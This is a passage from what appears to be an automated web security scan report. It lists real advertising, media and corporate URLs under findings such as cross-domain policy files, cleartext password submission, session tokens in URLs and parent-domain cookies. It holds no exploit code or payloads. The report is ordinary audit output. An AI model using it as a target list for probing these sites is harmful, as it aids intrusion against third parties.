5.96. http://rt1702.infolinks.com/crossdomain.xml

5.97. http://rt1803.infolinks.com/crossdomain.xml

5.98. http://rt1804.infolinks.com/crossdomain.xml

5.99. http://rt1901.infolinks.com/crossdomain.xml

5.100. http://rt1903.infolinks.com/crossdomain.xml

5.101. http://s0.2mdn.net/crossdomain.xml

5.102. http://sana.newsinc.com/crossdomain.xml

5.103. http://segment-pixel.invitemedia.com/crossdomain.xml

5.104. http://sensor2.suitesmart.com/crossdomain.xml

5.105. http://servedby.flashtalking.com/crossdomain.xml

5.106. http://spe.atdmt.com/crossdomain.xml

5.107. http://static.scanscout.com/crossdomain.xml

5.108. http://stats.kaltura.com/crossdomain.xml

5.109. http://t.mookie1.com/crossdomain.xml

5.110. http://tags.bluekai.com/crossdomain.xml

5.111. http://thumbnails.infolinks.com/crossdomain.xml

5.112. http://traffic.outbrain.com/crossdomain.xml

5.113. http://trk.vindicosuite.com/crossdomain.xml

5.114. http://u-ads.adap.tv/crossdomain.xml

5.115. http://vads.adbrite.com/crossdomain.xml

5.116. http://vast.bp3845889.btrll.com/crossdomain.xml

5.117. http://w88.go.com/crossdomain.xml

5.118. http://wls.wireless.att.com/crossdomain.xml

5.119. http://www.kaltura.com/crossdomain.xml

5.120. http://a.abc.com/crossdomain.xml

5.121. http://abc.go.com/crossdomain.xml

5.122. http://adimages.go.com/crossdomain.xml

5.123. http://ads.adsonar.com/crossdomain.xml

5.124. http://ads.dotomi.com/crossdomain.xml

5.125. http://ads.tw.adsonar.com/crossdomain.xml

5.126. http://adsatt.abc.starwave.com/crossdomain.xml

5.127. http://bh.heraldinteractive.com/crossdomain.xml

5.128. http://bostonherald.com/crossdomain.xml

5.129. http://bostonheraldnie.newspaperdirect.com/crossdomain.xml

5.130. http://cache.heraldinteractive.com/crossdomain.xml

5.131. http://cdn.abc.go.com/crossdomain.xml

5.132. http://cdn.media.abc.com/crossdomain.xml

5.133. http://cdn.media.abc.go.com/crossdomain.xml

5.134. http://cdn.video.abc.com/crossdomain.xml

5.135. http://cim.meebo.com/crossdomain.xml

5.136. http://cookex.amp.yahoo.com/crossdomain.xml

5.137. http://images.search.yahoo.com/crossdomain.xml

5.138. http://mi.adinterax.com/crossdomain.xml

5.139. http://omg.yahoo.com/crossdomain.xml

5.140. http://qa.n7.vp2.abc.go.com/crossdomain.xml

5.141. http://rd.meebo.com/crossdomain.xml

5.142. http://search.yahoo.com/crossdomain.xml

5.143. http://site.abc.go.com/crossdomain.xml

5.144. http://syndication.mmismm.com/crossdomain.xml

5.145. http://us.adserver.yahoo.com/crossdomain.xml

5.146. http://vid.catalog.newsinc.com/crossdomain.xml

5.147. http://www.att.com/crossdomain.xml

5.148. http://www.bostonherald.com/crossdomain.xml

5.149. http://www.meebo.com/crossdomain.xml

5.150. http://www.tmz.com/crossdomain.xml

5.151. http://bigapple.contextuads.com/crossdomain.xml

5.152. http://bit.ly/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://2912a.v.fwmrm.net/clientaccesspolicy.xml

6.2. http://adm.fwmrm.net/clientaccesspolicy.xml

6.3. http://adunit.cdn.auditude.com/clientaccesspolicy.xml

6.4. http://b.voicefive.com/clientaccesspolicy.xml

6.5. http://cdn.kaltura.com/clientaccesspolicy.xml

6.6. http://cdnbakmi.kaltura.com/clientaccesspolicy.xml

6.7. http://clk.atdmt.com/clientaccesspolicy.xml

6.8. http://dp.33across.com/clientaccesspolicy.xml

6.9. http://metrics.tmz.com/clientaccesspolicy.xml

6.10. http://pixel.33across.com/clientaccesspolicy.xml

6.11. http://s0.2mdn.net/clientaccesspolicy.xml

6.12. http://spe.atdmt.com/clientaccesspolicy.xml

6.13. http://stats.kaltura.com/clientaccesspolicy.xml

6.14. http://trk.vindicosuite.com/clientaccesspolicy.xml

6.15. http://w88.go.com/clientaccesspolicy.xml

6.16. http://www.kaltura.com/clientaccesspolicy.xml

6.17. http://ts1.mm.bing.net/clientaccesspolicy.xml

6.18. http://ts2.mm.bing.net/clientaccesspolicy.xml

6.19. http://ts3.mm.bing.net/clientaccesspolicy.xml

6.20. http://ts4.mm.bing.net/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://dw1.s81c.com/common/js/dynamicnav.js

7.2. http://forums.cpanel.net/calendar.php

7.3. http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html

7.4. http://jcp.org/aboutJava/communityprocess/maintenance/jsr234/index2.html

7.5. http://www.actvalue.com/

7.6. http://www.actvalue.com/pages/asp/editorial/ps_rfid.asp

7.7. http://www.ibm.com/common/js/dynamicnav.js

7.8. http://www.ibm.com/developerworks/java/

7.9. http://www.ibm.com/developerworks/java/find/standards/

7.10. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html

7.11. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html

7.12. http://www.ibm.com/developerworks/tivoli/library/s-csscript/

7.13. http://www.ibm.com/developerworks/tivoli/library/s-csscript/

7.14. http://www.ibm.com/search/csass/search/

7.15. http://www.ted.com/js/library.min.js

7.16. http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/

7.17. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/

7.18. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/

7.19. http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/

7.20. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/

7.21. http://www.tmz.com/signin/

7.22. http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/

7.23. http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/

7.24. http://www.usenetbinaries.com/l/newsgroups.html

8. SQL statement in request parameter

9. SSL cookie without secure flag set

10. Session token in URL

10.1. http://arc.help.yahoo.com/error.gif

10.2. http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard

10.3. http://omg.yahoo.com/

10.4. http://omg.yahoo.com/hot-topics

10.5. http://omg.yahoo.com/news/january-jones-welcomes-baby-boy-xander/72215

10.6. http://omg.yahoo.com/photos/what-were-they-thinking/5203

10.7. http://omg.yahoo.com/search

10.8. http://omg.yahoo.com/xhr/ad/LREC/2115806991

10.9. http://omg.yahoo.com/xhr/ad/LREC/2115823648

10.10. http://omg.yahoo.com/xhr/ad/LREC/2115823648

10.11. http://omg.yahoo.com/xhr/ad/MREC/2115823648

10.12. http://omg.yahoo.com/xhr/ad/MREC/2115823648

10.13. http://omg.yahoo.com/xhr/relatedsearch/

10.14. http://stats.kaltura.com//api_v3/index.php

10.15. http://wls.wireless.att.com/dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif

10.16. http://www.facebook.com/extern/login_status.php

10.17. http://www.itoncommand.com/GetAQuote.aspx

10.18. http://www.matrix42.com/new-to-matrix42/

10.19. http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp

11. Cookie scoped to parent domain

11.1. http://www.mailjet.com/

11.2. http://www.mailjet.com/pricing

11.3. https://www.mailjet.com/signup

11.4. http://27.xg4ken.com/media/redir.php

11.5. http://2912a.v.fwmrm.net/ad/l/1

11.6. http://2912a.v.fwmrm.net/ad/l/1

11.7. http://2912a.v.fwmrm.net/ad/l/1

11.8. http://2912a.v.fwmrm.net/ad/p/1

11.9. http://a.collective-media.net/adj/cm.rev_bostonherald/

11.10. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience

11.11. http://a.collective-media.net/adj/q1.bosherald/be_news

11.12. http://a.collective-media.net/adj/q1.bosherald/ent_fr

11.13. http://a.collective-media.net/adj/q1.bosherald/news

11.14. http://a.collective-media.net/cmadj/cm.rev_bostonherald/

11.15. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience

11.16. http://a.collective-media.net/cmadj/q1.bosherald/be_news

11.17. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr

11.18. http://a.collective-media.net/cmadj/q1.bosherald/news

11.19. http://a.tribalfusion.com/i.cid

11.20. http://a.tribalfusion.com/j.ad

11.21. http://a.tribalfusion.com/z/i.cid

11.22. http://ad.auditude.com/adserver

11.23. http://ad.auditude.com/adserver

11.24. http://ad.auditude.com/adserver

11.25. http://ad.auditude.com/adserver

11.26. http://ad.auditude.com/adserver

11.27. http://ad.auditude.com/adserver

11.28. http://ad.auditude.com/adserver

11.29. http://ad.auditude.com/adserver

11.30. http://ad.auditude.com/adserver

11.31. http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.2

11.32. http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.3

11.33. http://ad.doubleclick.net/adj/q1.bosherald/be_news

11.34. http://ad.doubleclick.net/adj/q1.bosherald/news

11.35. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_hookups

11.36. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_justice

11.37. http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/w%3B245892120%3B0-0%3B0%3B69485624%3B4986-300/600%3B43918246/43936033/1%3B%3B~okv%3D%3Bpc%3DDFP245079213%3B%3B~fdr%3D245079213%3B0-0%3B0%3B61866028%3B4986-300/600%3B44072410/44090197/1%3B%3B~sscs%3D%3fhttp://t.mookie1.com/t/v1/clk

11.38. http://ads.lucidmedia.com/clicksense/pixel

11.39. http://adserver.teracent.net/tase/ad

11.40. http://adserver.teracent.net/tase/redir/1316221519820_135153353_as3104_imp/vew

11.41. http://adserver.teracent.net/tase/redir/1316221548433_135109402_as3106_imp/vew

11.42. http://amch.questionmarket.com/adsc/d775029/8/923517/decide.php

11.43. http://apis.google.com/js/plusone.js

11.44. http://ar.voicefive.com/b/recruitBeacon.pli

11.45. http://ar.voicefive.com/b/wc_beacon.pli

11.46. http://ar.voicefive.com/bmx3/broker.pli

11.47. http://b.scorecardresearch.com/b

11.48. http://b.scorecardresearch.com/p

11.49. http://b.scorecardresearch.com/r

11.50. http://b.voicefive.com/b

11.51. http://b.voicefive.com/p

11.52. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9QaG90b1NsaWRlU2hvdy9ZQUhPT18xNDNfQjJDX01haWxfRXhwYW5kYWJsZV85NTR4NjAsY3QkMzYsZHQodHkkcm0sY2kocGlkJFlhaG9vLGNpZCR5YWhvb2hvdXNlLGNtcGlkJE1haWwsa2lkJDMwNzgxMDEpLGNkKHRpbWUkMCx0eXBlJGluKSh0aW1lJDAsdHlwZSR0aSkpKQ/2

11.53. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fUHVzaERvd25fOTU0eDYwX0FkSW50ZXJheCxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkTWFpbCxraWQkMzA5NjA3MiksY2QodGltZSQwLHR5cGUkaW4pKHRpbWUkMCx0eXBlJHRpKSkp/0

11.54. http://c.statcounter.com/t.php

11.55. http://cdnt.meteorsolutions.com/api/setid

11.56. http://cdnt.meteorsolutions.com/api/track

11.57. http://cdnt.meteorsolutions.com/api/track

11.58. http://clk.atdmt.com/go/335787632/direct

11.59. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js

11.60. http://d7.zedo.com/img/bh.gif

11.61. http://d7.zedo.com/utils/ecSet.js

11.62. http://g2.gumgum.com/services/get

11.63. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1030885431/

11.64. http://i.w55c.net/a.gif

11.65. http://ib.adnxs.com/ptj

11.66. http://id.google.com/verify/EAAAACVdGxrtkWeq3ahmGHeybfM.gif

11.67. http://id.google.com/verify/EAAAADcsWXnWx7Yx9gMo-IqM7r8.gif

11.68. http://image2.pubmatic.com/AdServer/Pug

11.69. http://imp.fetchback.com/serve/fb/adtag.js

11.70. http://imp.fetchback.com/serve/fb/imp

11.71. http://leadback.advertising.com/adcedge/lb

11.72. http://leadback.advertising.com/adcedge/lb

11.73. http://loadm.exelator.com/load/

11.74. http://log.go.com/log

11.75. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Bottom

11.76. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle

11.77. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle1

11.78. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Top

11.79. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Bottom

11.80. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle

11.81. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1

11.82. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top

11.83. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@x01!x01

11.84. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Bottom

11.85. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Middle

11.86. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top

11.87. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@x01!x01

11.88. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

11.89. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

11.90. http://odb.outbrain.com/utils/get

11.91. http://omg.yahoo.com/photos/what-were-they-thinking/5203

11.92. http://ping.crowdscience.com/ping.js

11.93. http://r.turn.com/r/beacon

11.94. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/

11.95. http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653

11.96. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13141172/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome

11.97. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13161297/hr=1/hl=11/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CBottom%2526page%253Dbh.heraldinteractive.com%25252F%252Fyour_tax_dollars_at_work

11.98. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13485129/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle

11.99. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=14907432/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome

11.100. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=39615410/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome

11.101. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=4347768/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome

11.102. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=71688841/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle

11.103. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=73068085/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle

11.104. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=87670031/hr=1/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome

11.105. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=15131969/hr=1/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fregional%25252Farticle

11.106. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=36701179/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle

11.107. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=3823857/hr=1/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fcolumnists%25252Farticle

11.108. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=4214348/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle

11.109. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=94471246/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle

11.110. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=1532848/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome

11.111. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=19365718/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome

11.112. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=2205187/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome

11.113. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=73177346/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome

11.114. http://r1-ads.ace.advertising.com/site=791296/size=300250/u=2/bnum=4256658/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tmz.com%252F2011%252F09%252F16%252Fjustin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone%252F%253Fadid%253Dhero1

11.115. http://r1-ads.ace.advertising.com/site=791296/size=300250/u=2/bnum=67593853/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

11.116. http://r1-ads.ace.advertising.com/site=804034/size=728090/u=2/bnum=48830520/hr=0/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F221%252Ftmz%252F728x90%252Fhomepage_btf%253Ft%253D1316238825238%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.tmz.com%25252F%2526refer%253D

11.117. http://receive.inplay.tubemogul.com/StreamReceiver/services

11.118. http://rs.gwallet.com/r1/pixel/x420r2425801

11.119. http://rt.legolas-media.com/lgrt

11.120. http://rt1302.infolinks.com/action/doq.htm

11.121. http://rt1701.infolinks.com/action/doq.htm

11.122. http://rt1702.infolinks.com/action/doq.htm

11.123. http://rt1803.infolinks.com/action/doq.htm

11.124. http://rt1804.infolinks.com/action/doq.htm

11.125. http://rt1901.infolinks.com/action/doq.htm

11.126. http://rt1903.infolinks.com/action/doq.htm

11.127. http://sensor2.suitesmart.com/sensor4.js

11.128. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.129. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.130. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.131. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.132. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.133. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.134. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.135. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.136. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.137. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.138. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.139. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.140. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.141. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.142. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.143. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.144. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.145. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.146. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.147. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.148. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.149. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.150. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.151. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.152. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.153. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.154. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.155. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.156. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.157. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.158. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.159. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.160. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.161. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.162. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.163. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.164. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.165. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.166. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.167. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.168. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.169. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.170. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.171. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.172. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.173. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.174. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.175. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.176. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.177. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.178. http://tag.contextweb.com/TagPublish/GetAd.aspx

11.179. http://tag.contextweb.com/TagPublish/GetAd.aspx

11.180. http://tenzing.fmpub.net/

11.181. http://testdm.travelers.com/trvwics.gif

11.182. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FPhotoSlideShow%2FYAHOO_143_B2C_Mail_Expandable_954x60%2CC%3DMail%2CP%3DYahoo%2CK%3D3078101/0.9137649598997086/0/in%2Cti/ti.gif

11.183. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.21918878913857043/0/in%2Cti/ti.gif

11.184. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.3687601247802377/0/in%2Cti/ti.gif

11.185. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.558339134324342/0/in%2Cti/ti.gif

11.186. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.9227102545555681/0/in%2Cti/ti.gif

11.187. http://traffic.outbrain.com/network/redir

